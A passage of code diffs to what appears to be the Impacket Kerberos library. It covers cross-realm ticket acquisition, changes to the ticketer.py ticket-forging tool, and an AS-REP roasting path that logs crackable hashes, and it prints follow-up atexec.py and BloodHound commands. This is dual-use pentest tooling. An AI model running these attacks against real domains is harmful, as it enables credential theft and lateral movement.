+            print(f'[-] Too many referral hops ({max_hops})')
+            sys.exit(1)
+
+    else:
+        if not target_realm:
+            target_realm = ticket_sname_parts[1].upper() if len(ticket_sname_parts) > 1 else None
+        if not target_realm:
+            print('[-] Cannot determine target realm. Use -target-realm.')
+            sys.exit(1)
+        print(f'[*] Already have cross-realm TGT to {target_realm}')
+
+    # ── Final step: Get service tickets from target realm KDC ──────────
+    out_ccache = None
+    first_service = True
+    for svc_type in services:
+        svc_spn = f'{svc_type}/{args.target}'
+        print(f'\n[*] Requesting {svc_spn} from {target_realm} KDC ({args.dc_ip2})')
+        dbg(f'Final: SPN={svc_spn} realm={target_realm} crealm={client_home_realm} KDC={args.dc_ip2}')
+
+        message = build_tgs_req(decoded, cipher, session_key,
+                                svc_spn, target_realm, client_realm=client_home_realm)
+
+        try:
+            tgs_rep = send_tgs_req(message, args.dc_ip2)
+        except KerberosError as e:
+            print(f'[-] Failed to get {svc_spn}: {e}')
+            continue
+
+        svc_cname, svc_crealm, svc_sname, svc_srealm = get_ticket_info(tgs_rep)
+        print(f'[+] Got: {svc_sname}@{svc_srealm}')
+
+        new_session_key = decrypt_tgs_rep(tgs_rep, session_key)
+        tgs_raw = encoder.encode(tgs_rep)
+
+        if first_service:
+            out_ccache = CCache()
+            out_ccache.fromTGS(tgs_raw, session_key, session_key)
+            first_service = False
+        else:
+            # Add additional credential to existing ccache
+            tmp_ccache = CCache()
+            tmp_ccache.fromTGS(tgs_raw, session_key, session_key)
+            out_ccache.credentials.extend(tmp_ccache.credentials)
+    if out_ccache is None:
+        print('[-] No service tickets obtained')
+        sys.exit(1)
+
+    svc_filename = f'krb_{args.target.split(".")[0].lower()}.ccache'
+    out_ccache.saveFile(svc_filename)
+
+    print(f'\n[+] Saved {len(out_ccache.credentials)} ticket(s) to {svc_filename}')
+    print(f'[*] Use:')
+    print(f'    export KRB5CCNAME=./{svc_filename}')
+    if 'ldap' in services:
+        print(f'    bloodhound-python -c All -k -no-pass -d {target_realm.lower()} -dc {args.target}')
+    else:
+        print(f'    smbclient.py -k -no-pass {args.target}')
+        print(f'    atexec.py -k -no-pass {args.target} <command>')
+
+
+if __name__ == '__main__':
+    main()

--- a/examples/ticketer.py
+++ b/examples/ticketer.py
@@ -415,6 +415,7 @@ class TICKETER:
                 
                 cipher = _enctype_table[creds['key']['keytype']]
                 sessionKey = Key(creds['key']['keytype'], creds['key']['keyvalue'])
+                oldSessionKey = sessionKey
                 
                 # If we have the krbtgt AES key, decrypt the ticket and extract domain info from PAC
                 if self.__options.aesKey and (not self.__options.domain_sid or not self.__options.user_id):
@@ -501,48 +502,52 @@ class TICKETER:
                 tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.__domain, None, tgt, cipher,
                                                                         sessionKey)
                 kdcRep = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
-            self.__requested_ticket_times = self._extract_reply_ticket_times(kdcRep, oldSessionKey)
+
+            if not self.__options.k:
+                self.__requested_ticket_times = self._extract_reply_ticket_times(kdcRep, oldSessionKey)
 
             # Let's check we have all the necessary data based on the ciphers used. Boring checks
-            ticketCipher = int(kdcRep['ticket']['enc-part']['etype'])
-            encPartCipher = int(kdcRep['enc-part']['etype'])
+            # Skip these checks for ccache-sourced TGTs since the etype fields may not reflect the actual cipher
+            if not self.__options.k:
+                ticketCipher = int(kdcRep['ticket']['enc-part']['etype'])
+                encPartCipher = int(kdcRep['enc-part']['etype'])
 
-            if (ticketCipher == EncryptionTypes.rc4_hmac.value or encPartCipher == EncryptionTypes.rc4_hmac.value) and \
-                            self.__options.nthash is None:
-                logging.critical('rc4_hmac is used in this ticket and you haven\'t specified the -nthash parameter. '
-                                 'Can\'t continue ( or try running again w/o the -request option)')
-                return None, None
+                if (ticketCipher == EncryptionTypes.rc4_hmac.value or encPartCipher == EncryptionTypes.rc4_hmac.value) and \
+                                self.__options.nthash is None:
+                    logging.critical('rc4_hmac is used in this ticket and you haven\'t specified the -nthash parameter. '
+                                     'Can\'t continue ( or try running again w/o the -request option)')
+                    return None, None
 
-            if (ticketCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value or
-                encPartCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value) and \
-                self.__options.aesKey is None:
-                logging.critical(
-                    'aes128_cts_hmac_sha1_96 is used in this ticket and you haven\'t specified the -aesKey parameter. '
-                    'Can\'t continue (or try running again w/o the -request option)')
-                return None, None
+                if (ticketCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value or
+                    encPartCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value) and \
+                    self.__options.aesKey is None:
+                    logging.critical(
+                        'aes128_cts_hmac_sha1_96 is used in this ticket and you haven\'t specified the -aesKey parameter. '
+                        'Can\'t continue (or try running again w/o the -request option)')
+                    return None, None
 
-            if (ticketCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value or
-                encPartCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value) and \
-                self.__options.aesKey is not None and len(self.__options.aesKey) > 32:
-                logging.critical(
-                    'aes128_cts_hmac_sha1_96 is used in this ticket and the -aesKey you specified is not aes128. '
-                    'Can\'t continue (or try running again w/o the -request option)')
-                return None, None
+                if (ticketCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value or
+                    encPartCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value) and \
+                    self.__options.aesKey is not None and len(self.__options.aesKey) > 32:
+                    logging.critical(
+                        'aes128_cts_hmac_sha1_96 is used in this ticket and the -aesKey you specified is not aes128. '
+                        'Can\'t continue (or try running again w/o the -request option)')
+                    return None, None
 
-            if (ticketCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value or
-                 encPartCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value) and self.__options.aesKey is None:
-                logging.critical(
-                    'aes256_cts_hmac_sha1_96 is used in this ticket and you haven\'t specified the -aesKey parameter. '
-                    'Can\'t continue (or try running again w/o the -request option)')
-                return None, None
+                if (ticketCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value or
+                     encPartCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value) and self.__options.aesKey is None:
+                    logging.critical(
+                        'aes256_cts_hmac_sha1_96 is used in this ticket and you haven\'t specified the -aesKey parameter. '
+                        'Can\'t continue (or try running again w/o the -request option)')
+                    return None, None
 
-            if ( ticketCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value or
-                 encPartCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value) and \
-                 self.__options.aesKey is not None and len(self.__options.aesKey) < 64:
-                logging.critical(
-                    'aes256_cts_hmac_sha1_96 is used in this ticket and the -aesKey you specified is not aes256. '
-                    'Can\'t continue')
-                return None, None
+                if ( ticketCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value or
+                     encPartCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value) and \
+                     self.__options.aesKey is not None and len(self.__options.aesKey) < 64:
+                    logging.critical(
+                        'aes256_cts_hmac_sha1_96 is used in this ticket and the -aesKey you specified is not aes256. '
+                        'Can\'t continue')
+                    return None, None
             kdcRep['cname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value
             kdcRep['cname']['name-string'] = noValue
             kdcRep['cname']['name-string'][0] = self.__options.impersonate or self.__target
@@ -1109,12 +1114,7 @@ class TICKETER:
     def saveTicket(self, ticket, sessionKey):
         logging.info('Saving/Updating ticket in %s' % (self.__target.replace('/', '.') + '.ccache'))
         from impacket.krb5.ccache import CCache
-        from os import getenv, path
-        krb5 = getenv('KRB5CCNAME')
-        if krb5 and path.isfile(krb5):
-            ccache = CCache.loadFile(krb5)
-        else:
-            ccache = CCache()
+        ccache = CCache()
 
         if self.__server == self.__domain:
             ccache.fromTGT(ticket, sessionKey, sessionKey)

--- a/impacket/krb5/ccache.py
+++ b/impacket/krb5/ccache.py
@@ -663,10 +663,14 @@ class CCache:
             principal = 'krbtgt/%s@%s' % (domain.upper(), domain.upper())
             creds = ccache.getCredential(principal)
             if creds is None:
-                # Cross-realm: look for any krbtgt ticket
+                # Cross-realm: look for a referral TGT to the requested domain
+                # (krbtgt/<target-realm>@<source-realm>). Requiring the target
+                # realm to match the requested domain keeps parseFile honest —
+                # asking for a domain not represented in the cache still returns None.
+                prefix = 'KRBTGT/' + domain.upper() + '@'
                 for c in ccache.credentials:
                     serverPrincipal = c['server'].prettyPrint().decode('utf-8')
-                    if serverPrincipal.upper().startswith('KRBTGT/'):
+                    if serverPrincipal.upper().startswith(prefix):
                         creds = c
                         principal = serverPrincipal.upper()
                         LOG.debug('Found cross-realm TGT: %s' % principal)

--- a/impacket/krb5/ccache.py
+++ b/impacket/krb5/ccache.py
@@ -636,11 +636,31 @@ class CCache:
             principal = '%s@%s' % (target.upper(), domain.upper())
             creds = ccache.getCredential(principal)
 
+            if creds is None:
+                # Cross-realm: the ticket might be stored under a different realm
+                for c in ccache.credentials:
+                    serverPrincipal = c['server'].prettyPrint().decode('utf-8')
+                    if serverPrincipal.upper().startswith(target.upper() + '@'):
+                        creds = c
+                        principal = serverPrincipal.upper()
+                        LOG.debug('Found cross-realm credential for %s' % principal)
+                        break
+
         TGT = None
         TGS = None
         if creds is None:
+            # Try TGT for the specified domain first
             principal = 'krbtgt/%s@%s' % (domain.upper(), domain.upper())
             creds = ccache.getCredential(principal)
+            if creds is None:
+                # Cross-realm: look for any krbtgt ticket
+                for c in ccache.credentials:
+                    serverPrincipal = c['server'].prettyPrint().decode('utf-8')
+                    if serverPrincipal.upper().startswith('KRBTGT/'):
+                        creds = c
+                        principal = serverPrincipal.upper()
+                        LOG.debug('Found cross-realm TGT: %s' % principal)
+                        break
             if creds is not None:
                 LOG.debug('Using TGT from cache')
                 TGT = creds.toTGT()

--- a/impacket/krb5/ccache.py
+++ b/impacket/krb5/ccache.py
@@ -637,13 +637,23 @@ class CCache:
             creds = ccache.getCredential(principal)
 
             if creds is None:
-                # Cross-realm: the ticket might be stored under a different realm
+                # Cross-realm: try matching by exact SPN with any realm,
+                # then by hostname with any service type and realm
+                targetHost = target.upper().split('/')[1] if '/' in target else target.upper()
                 for c in ccache.credentials:
-                    serverPrincipal = c['server'].prettyPrint().decode('utf-8')
-                    if serverPrincipal.upper().startswith(target.upper() + '@'):
+                    serverPrincipal = c['server'].prettyPrint().decode('utf-8').upper()
+                    # Exact SPN match with different realm
+                    if serverPrincipal.startswith(target.upper() + '@'):
                         creds = c
-                        principal = serverPrincipal.upper()
+                        principal = serverPrincipal
                         LOG.debug('Found cross-realm credential for %s' % principal)
+                        break
+                    # Same hostname, different service type or realm
+                    cachedHost = serverPrincipal.split('/')[1].split('@')[0] if '/' in serverPrincipal else None
+                    if cachedHost and cachedHost == targetHost:
+                        creds = c
+                        principal = serverPrincipal
+                        LOG.debug('Found cross-realm credential for %s (matched by hostname)' % principal)
                         break
 
         TGT = None

--- a/impacket/krb5/constants.py
+++ b/impacket/krb5/constants.py
@@ -111,6 +111,8 @@ class PreAuthenticationDataTypes(Enum):
     PA_ENCRYPTED_CHALLENGE     = 138
     KERB_KEY_LIST_REQ          = 161
     KERB_KEY_LIST_REP          = 162
+    PA_REQ_ENC_PA_REP          = 149
+    PA_AS_FRESHNESS            = 150
     PA_SUPPORTED_ENCTYPES      = 165
     PA_PAC_OPTIONS             = 167
     KERB_SUPERSEDED_BY_USER    = 170
@@ -465,8 +467,12 @@ class EncryptionTypes(Enum):
     des3_cbc_sha1_kd             = 16
     aes128_cts_hmac_sha1_96      = 17
     aes256_cts_hmac_sha1_96      = 18
+    aes128_cts_hmac_sha256_128   = 19
+    aes256_cts_hmac_sha384_192   = 20
     rc4_hmac                     = 23
     rc4_hmac_exp                 = 24
+    camellia128_cts_cmac         = 25
+    camellia256_cts_cmac         = 26
     subkey_keymaterial           = 65
     rc4_hmac_old_exp             = -135
 

--- a/impacket/krb5/kerberosv5.py
+++ b/impacket/krb5/kerberosv5.py
@@ -276,10 +276,6 @@ def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', kdcH
         return tgt, cipher, key, sessionKey
 
     # Step 1: Probe AS-REQ without PA_ENC_TIMESTAMP (matching kinit)
-    pacRequest = KERB_PA_PAC_REQUEST()
-    pacRequest['include-pac'] = requestPAC
-    encodedPacRequest = encoder.encode(pacRequest)
-
     asReq = AS_REQ()
     asReq['pvno'] = 5
     asReq['msg-type'] = int(constants.ApplicationTagNumbers.AS_REQ.value)
@@ -291,9 +287,6 @@ def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', kdcH
     asReq['padata'][1] = noValue
     asReq['padata'][1]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_REQ_ENC_PA_REP.value)
     asReq['padata'][1]['padata-value'] = b''
-    asReq['padata'][2] = noValue
-    asReq['padata'][2]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
-    asReq['padata'][2]['padata-value'] = encodedPacRequest
 
     reqBody = seq_set(asReq, 'req-body')
 
@@ -392,6 +385,7 @@ def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', kdcH
             raise Exception('No Encryption Data Available!')
         key = cipher.string_to_key(password, encryptionTypesData[enctype], None)
 
+    if preAuth is True:
         # Step 2: Authenticated AS-REQ with PA_ENC_TIMESTAMP (matching kinit)
         timeStamp = PA_ENC_TS_ENC()
         now = datetime.datetime.now(datetime.timezone.utc)

--- a/impacket/krb5/kerberosv5.py
+++ b/impacket/krb5/kerberosv5.py
@@ -119,8 +119,6 @@ def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', kdcH
         except TypeError:
             pass
 
-    asReq = AS_REQ()
-
     domain = domain.upper()
 
     if serverName is None:
@@ -128,50 +126,18 @@ def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', kdcH
     else:
         serverName = Principal(serverName, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
 
-    pacRequest = KERB_PA_PAC_REQUEST()
-    pacRequest['include-pac'] = requestPAC
-    encodedPacRequest = encoder.encode(pacRequest)
-
-    asReq['pvno'] = 5
-    asReq['msg-type'] =  int(constants.ApplicationTagNumbers.AS_REQ.value)
-
-    asReq['padata'] = noValue
-    asReq['padata'][0] = noValue
-    asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
-    asReq['padata'][0]['padata-value'] = encodedPacRequest
-
-    reqBody = seq_set(asReq, 'req-body')
-
-    opts = list()
-    opts.append( constants.KDCOptions.forwardable.value )
-    opts.append( constants.KDCOptions.renewable.value )
-    opts.append( constants.KDCOptions.proxiable.value )
-    reqBody['kdc-options']  = constants.encodeFlags(opts)
-
-    seq_set(reqBody, 'sname', serverName.components_to_asn1)
-    seq_set(reqBody, 'cname', clientName.components_to_asn1)
-
     if domain == '':
         raise Exception('Empty Domain not allowed in Kerberos')
-
-    reqBody['realm'] = domain
-
-    now = datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=1)
-    reqBody['till'] = KerberosTime.to_asn1(now)
-    reqBody['rtime'] = KerberosTime.to_asn1(now)
-    reqBody['nonce'] =  rand.getrandbits(31)
 
     # Yes.. this shouldn't happen but it's inherited from the past
     if aesKey is None:
         aesKey = b''
 
+    pacRequest = KERB_PA_PAC_REQUEST()
+    pacRequest['include-pac'] = requestPAC
+    encodedPacRequest = encoder.encode(pacRequest)
+
     if nthash == b'':
-        # This is still confusing. I thought KDC_ERR_ETYPE_NOSUPP was enough, 
-        # but I found some systems that accepts all ciphers, and trigger an error 
-        # when requesting subsequent TGS :(. More research needed.
-        # So, in order to support more than one cypher, I'm setting aes first
-        # since most of the systems would accept it. If we're lucky and 
-        # KDC_ERR_ETYPE_NOSUPP is returned, we will later try rc4.
         if aesKey != b'':
             if len(aesKey) == 32:
                 supportedCiphers = (int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value),)
@@ -180,125 +146,38 @@ def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', kdcH
         else:
             supportedCiphers = (int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value),)
     else:
-        # We have hashes to try, only way is to request RC4 only
         supportedCiphers = (int(constants.EncryptionTypes.rc4_hmac.value),)
 
-    seq_set_iter(reqBody, 'etype', supportedCiphers)
-
-    message = encoder.encode(asReq)
-
-    try:
-        r = sendReceive(message, domain, kdcHost)
-    except KerberosError as e:
-        if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
-            if supportedCiphers[0] in (constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value, constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value) and aesKey == b'':
-                supportedCiphers = (int(constants.EncryptionTypes.rc4_hmac.value),)
-                seq_set_iter(reqBody, 'etype', supportedCiphers)
-                message = encoder.encode(asReq)
-                r = sendReceive(message, domain, kdcHost)
-            else:
-                raise
-        else:
-            raise
-
-    # This should be the PREAUTH_FAILED packet or the actual TGT if the target principal has the
-    # 'Do not require Kerberos preauthentication' set
-    preAuth = True
-    try:
-        asRep = decoder.decode(r, asn1Spec = KRB_ERROR())[0]
-    except:
-        # Most of the times we shouldn't be here, is this a TGT?
-        asRep = decoder.decode(r, asn1Spec=AS_REP())[0]
-        # Yes
-        preAuth = False
-
-    encryptionTypesData = dict()
-    salt = ''
-    if preAuth is False:
-        # In theory, we should have the right credentials for the etype specified before.
-        methods = asRep['padata']
-        encryptionTypesData[supportedCiphers[0]] = salt # handle RC4 fallback, we don't need any salt
-        tgt = r
-    else:
-        methods = decoder.decode(asRep['e-data'], asn1Spec=METHOD_DATA())[0]
-
-    for method in methods:
-        if method['padata-type'] == constants.PreAuthenticationDataTypes.PA_ETYPE_INFO2.value:
-            etypes2 = decoder.decode(method['padata-value'], asn1Spec = ETYPE_INFO2())[0]
-            for etype2 in etypes2:
-                try:
-                    if etype2['salt'] is None or etype2['salt'].hasValue() is False:
-                        salt = ''
-                    else:
-                        salt = etype2['salt'].prettyPrint()
-                except PyAsn1Error:
-                    salt = ''
-
-                encryptionTypesData[etype2['etype']] = salt.encode('utf-8')
-        elif method['padata-type'] == constants.PreAuthenticationDataTypes.PA_ETYPE_INFO.value:
-            etypes = decoder.decode(method['padata-value'], asn1Spec = ETYPE_INFO())[0]
-            for etype in etypes:
-                try:
-                    if etype['salt'] is None or etype['salt'].hasValue() is False:
-                        salt = ''
-                    else:
-                        salt = etype['salt'].prettyPrint()
-                except PyAsn1Error:
-                    salt = ''
-
-                encryptionTypesData[etype['etype']] = salt.encode('utf-8')
-
     enctype = supportedCiphers[0]
-
     cipher = _enctype_table[enctype]
 
-    # Pass the hash/aes key :P
+    usingPassword = False
     if isinstance(nthash, bytes) and nthash != b'':
         key = Key(cipher.enctype, nthash)
     elif aesKey != b'':
         key = Key(cipher.enctype, aesKey)
     else:
-        key = cipher.string_to_key(password, encryptionTypesData[enctype], None)
+        usingPassword = True
+        userName = clientName.components[0] if hasattr(clientName, 'components') and len(clientName.components) > 0 else str(clientName)
+        if isinstance(userName, bytes):
+            userName = userName.decode('utf-8')
+        if userName.endswith('$'):
+            salt = ("%shost%s.%s" % (domain, userName.rstrip('$').lower(), domain.lower())).encode('utf-8')
+        else:
+            salt = ("%s%s" % (domain, userName)).encode('utf-8')
+        LOG.debug('Local salt guess: %s' % salt.decode('utf-8'))
+        key = cipher.string_to_key(password, salt, None)
 
-    if preAuth is True:
-        if enctype in encryptionTypesData is False:
-            raise Exception('No Encryption Data Available!')
-
-        # Let's build the timestamp
-        timeStamp = PA_ENC_TS_ENC()
-
-        now = datetime.datetime.now(datetime.timezone.utc)
-        timeStamp['patimestamp'] = KerberosTime.to_asn1(now)
-        timeStamp['pausec'] = now.microsecond
-
-        # Encrypt the shyte
-        encodedTimeStamp = encoder.encode(timeStamp)
-
-        # Key Usage 1
-        # AS-REQ PA-ENC-TIMESTAMP padata timestamp, encrypted with the
-        # client key (Section 5.2.7.2)
-        encriptedTimeStamp = cipher.encrypt(key, 1, encodedTimeStamp, None)
-
-        encryptedData = EncryptedData()
-        encryptedData['etype'] = cipher.enctype
-        encryptedData['cipher'] = encriptedTimeStamp
-        encodedEncryptedData = encoder.encode(encryptedData)
-
-        # Now prepare the new AS_REQ again with the PADATA
-        # ToDo: cannot we reuse the previous one?
+    if kerberoast_no_preauth:
+        # AS-REP roasting: send without PA_ENC_TIMESTAMP intentionally
         asReq = AS_REQ()
-
         asReq['pvno'] = 5
-        asReq['msg-type'] =  int(constants.ApplicationTagNumbers.AS_REQ.value)
+        asReq['msg-type'] = int(constants.ApplicationTagNumbers.AS_REQ.value)
 
         asReq['padata'] = noValue
         asReq['padata'][0] = noValue
-        asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_ENC_TIMESTAMP.value)
-        asReq['padata'][0]['padata-value'] = encodedEncryptedData
-
-        asReq['padata'][1] = noValue
-        asReq['padata'][1]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
-        asReq['padata'][1]['padata-value'] = encodedPacRequest
+        asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
+        asReq['padata'][0]['padata-value'] = encodedPacRequest
 
         reqBody = seq_set(asReq, 'req-body')
 
@@ -311,59 +190,182 @@ def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', kdcH
         seq_set(reqBody, 'sname', serverName.components_to_asn1)
         seq_set(reqBody, 'cname', clientName.components_to_asn1)
 
-        reqBody['realm'] =  domain
+        reqBody['realm'] = domain
 
         now = datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=1)
         reqBody['till'] = KerberosTime.to_asn1(now)
-        reqBody['rtime'] =  KerberosTime.to_asn1(now)
+        reqBody['rtime'] = KerberosTime.to_asn1(now)
         reqBody['nonce'] = rand.getrandbits(31)
 
-        seq_set_iter(reqBody, 'etype', ( (int(cipher.enctype),)))
+        seq_set_iter(reqBody, 'etype', supportedCiphers)
 
         try:
-            tgt = sendReceive(encoder.encode(asReq), domain, kdcHost)
+            r = sendReceive(encoder.encode(asReq), domain, kdcHost)
+        except KerberosError as e:
+            if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
+                if supportedCiphers[0] in (constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value, constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value) and aesKey == b'':
+                    supportedCiphers = (int(constants.EncryptionTypes.rc4_hmac.value),)
+                    enctype = supportedCiphers[0]
+                    cipher = _enctype_table[enctype]
+                    seq_set_iter(reqBody, 'etype', supportedCiphers)
+                    r = sendReceive(encoder.encode(asReq), domain, kdcHost)
+                else:
+                    raise
+            else:
+                raise
+
+        try:
+            decoder.decode(r, asn1Spec = KRB_ERROR())[0]
+            # Got an error back - preauth is required, can't AS-REP roast this account
+            raise Exception('Account does not have DONT_REQUIRE_PREAUTH set')
         except Exception as e:
-            if str(e).find('KDC_ERR_ETYPE_NOSUPP') >= 0:
-                if lmhash == b'' and nthash == b'' and (aesKey == b'' or aesKey is None):
-                    from impacket.ntlm import compute_lmhash, compute_nthash
-                    lmhash = compute_lmhash(password)
-                    nthash = compute_nthash(password)
-                    return getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey, kdcHost, requestPAC)
-            raise
+            if 'DONT_REQUIRE_PREAUTH' in str(e):
+                raise
+            # Not a KRB_ERROR, so it's an AS-REP - account is roastable
+            asRep = decoder.decode(r, asn1Spec=AS_REP())[0]
+            tgt = r
 
+        cipherText = asRep['enc-part']['cipher']
 
-        asRep = decoder.decode(tgt, asn1Spec = AS_REP())[0]
-
-    # So, we have the TGT, now extract the new session key and finish
-    cipherText = asRep['enc-part']['cipher']
-
-    if preAuth is False:
-        # Let's output the TGT enc-part/cipher in John format, in case somebody wants to use it.
         LOG.debug('$krb5asrep$%d$%s@%s:%s$%s' % (asRep['enc-part']['etype'],clientName, domain, hexlify(asRep['enc-part']['cipher'].asOctets()[:16]),
                                            hexlify(asRep['enc-part']['cipher'].asOctets()[16:])) )
-    # Key Usage 3
-    # AS-REP encrypted part (includes TGS session key or
-    # application session key), encrypted with the client key
-    # (Section 5.4.2)
-    try:
-        plainText = cipher.decrypt(key, 3, cipherText)
-    except InvalidChecksum as e:
-        # probably bad password if preauth is disabled
-        if preAuth is False:
+        try:
+            plainText = cipher.decrypt(key, 3, cipherText)
+        except InvalidChecksum as e:
             error_msg = "failed to decrypt session key: %s" % str(e)
-            if kerberoast_no_preauth:
-                LOG.debug(SessionKeyDecryptionError(error_msg, asRep, cipher, key, cipherText))
-                return tgt, None, key, None
+            LOG.debug(SessionKeyDecryptionError(error_msg, asRep, cipher, key, cipherText))
+            return tgt, None, key, None
+
+        encASRepPart = decoder.decode(plainText, asn1Spec = EncASRepPart())[0]
+        cipher = _enctype_table[encASRepPart['key']['keytype']]
+        sessionKey = Key(cipher.enctype,encASRepPart['key']['keyvalue'].asOctets())
+
+        return tgt, cipher, key, sessionKey
+
+    # Normal auth: include PA_ENC_TIMESTAMP in the first AS-REQ
+    timeStamp = PA_ENC_TS_ENC()
+    now = datetime.datetime.now(datetime.timezone.utc)
+    timeStamp['patimestamp'] = KerberosTime.to_asn1(now)
+    timeStamp['pausec'] = now.microsecond
+
+    encodedTimeStamp = encoder.encode(timeStamp)
+    encriptedTimeStamp = cipher.encrypt(key, 1, encodedTimeStamp, None)
+
+    encryptedData = EncryptedData()
+    encryptedData['etype'] = cipher.enctype
+    encryptedData['cipher'] = encriptedTimeStamp
+    encodedEncryptedData = encoder.encode(encryptedData)
+
+    asReq = AS_REQ()
+    asReq['pvno'] = 5
+    asReq['msg-type'] =  int(constants.ApplicationTagNumbers.AS_REQ.value)
+
+    asReq['padata'] = noValue
+    asReq['padata'][0] = noValue
+    asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_ENC_TIMESTAMP.value)
+    asReq['padata'][0]['padata-value'] = encodedEncryptedData
+
+    asReq['padata'][1] = noValue
+    asReq['padata'][1]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
+    asReq['padata'][1]['padata-value'] = encodedPacRequest
+
+    reqBody = seq_set(asReq, 'req-body')
+
+    opts = list()
+    opts.append( constants.KDCOptions.forwardable.value )
+    opts.append( constants.KDCOptions.renewable.value )
+    opts.append( constants.KDCOptions.proxiable.value )
+    reqBody['kdc-options'] = constants.encodeFlags(opts)
+
+    seq_set(reqBody, 'sname', serverName.components_to_asn1)
+    seq_set(reqBody, 'cname', clientName.components_to_asn1)
+
+    reqBody['realm'] = domain
+
+    now = datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=1)
+    reqBody['till'] = KerberosTime.to_asn1(now)
+    reqBody['rtime'] = KerberosTime.to_asn1(now)
+    reqBody['nonce'] = rand.getrandbits(31)
+
+    seq_set_iter(reqBody, 'etype', supportedCiphers)
+
+    try:
+        tgt = sendReceive(encoder.encode(asReq), domain, kdcHost)
+    except KerberosError as e:
+        if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
+            if supportedCiphers[0] in (constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value, constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value) and aesKey == b'':
+                from impacket.ntlm import compute_lmhash, compute_nthash
+                if lmhash == b'' and nthash == b'' and (aesKey == b'' or aesKey is None):
+                    lmhash = compute_lmhash(password)
+                    nthash = compute_nthash(password)
+                return getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey, kdcHost, requestPAC, serverName)
             else:
-                raise SessionKeyDecryptionError(error_msg, asRep, cipher, key, cipherText)
-        raise
+                raise
+        elif e.getErrorCode() == constants.ErrorCodes.KDC_ERR_PREAUTH_FAILED.value and usingPassword:
+            # Local salt guess was wrong (renamed account, non-standard UPN, etc.)
+            # Extract the real salt from the PREAUTH_FAILED error's e-data
+            LOG.debug('Local salt guess failed, extracting salt from KDC error response')
+            errorPacket = e.getErrorPacket()
+            realSalt = b''
+            try:
+                methods = decoder.decode(errorPacket['e-data'], asn1Spec=METHOD_DATA())[0]
+                for method in methods:
+                    if method['padata-type'] == constants.PreAuthenticationDataTypes.PA_ETYPE_INFO2.value:
+                        etypes2 = decoder.decode(method['padata-value'], asn1Spec = ETYPE_INFO2())[0]
+                        for etype2 in etypes2:
+                            try:
+                                if etype2['salt'] is not None and etype2['salt'].hasValue():
+                                    realSalt = etype2['salt'].prettyPrint().encode('utf-8')
+                            except PyAsn1Error:
+                                pass
+                    elif method['padata-type'] == constants.PreAuthenticationDataTypes.PA_ETYPE_INFO.value:
+                        etypes = decoder.decode(method['padata-value'], asn1Spec = ETYPE_INFO())[0]
+                        for etype in etypes:
+                            try:
+                                if etype['salt'] is not None and etype['salt'].hasValue():
+                                    realSalt = etype['salt'].prettyPrint().encode('utf-8')
+                            except PyAsn1Error:
+                                pass
+            except Exception:
+                raise e
+
+            if realSalt == b'' or realSalt == salt:
+                raise e
+
+            LOG.debug('KDC returned salt: %s' % realSalt.decode('utf-8'))
+            realSaltStr = realSalt.decode('utf-8')
+            if realSaltStr.startswith(domain):
+                correctUser = realSaltStr[len(domain):]
+                LOG.info('Salt mismatch: provided username "%s", correct username "%s"' % (userName, correctUser))
+
+            key = cipher.string_to_key(password, realSalt, None)
+
+            timeStamp = PA_ENC_TS_ENC()
+            retryNow = datetime.datetime.now(datetime.timezone.utc)
+            timeStamp['patimestamp'] = KerberosTime.to_asn1(retryNow)
+            timeStamp['pausec'] = retryNow.microsecond
+            encodedTimeStamp = encoder.encode(timeStamp)
+            encriptedTimeStamp = cipher.encrypt(key, 1, encodedTimeStamp, None)
+
